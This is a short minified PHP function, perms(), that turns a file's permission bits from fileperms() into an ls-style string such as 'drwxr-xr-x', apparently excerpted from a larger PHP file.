function perms($file){$perms=fileperms($file);if(($perms&0xC000)==0xC000){$info='s';}elseif(($perms&0xA000)==0xA000){$info='l';}elseif(($perms&0x8000)==0x8000){$info='-';}elseif(($perms&0x6000)==0x6000){$info='b';}elseif(($perms&0x4000)==0x4000){$info='d';}elseif(($perms&0x2000)==0x2000){$info='c';}elseif(($perms&0x1000)==0x1000){$info='p';}else {$info='u';}$info.=(($perms&0x0100)?'r':'-');$info.=(($perms&0x0080)?'w':'-');$info.=(($perms&0x0040)?(($perms&0x0800)?'s':'x'):(($perms&0x0800)?'S':'-'));$info.=(($perms&0x0020)?'r':'-');$info.=(($perms&0x0010)?'w':'-');$info.=(($perms&0x0008)?(($perms&0x0400)?'s':'x'):(($perms&0x0400)?'S':'-'));$info.=(($perms&0x0004)?'r':'-');$info.=(($perms&0x0002)?'w':'-');$info.=(($perms&0x0001)?(($perms&0x0200)?'t':'x'):(($perms&0x0200)?'T':'-'));return $info;}?>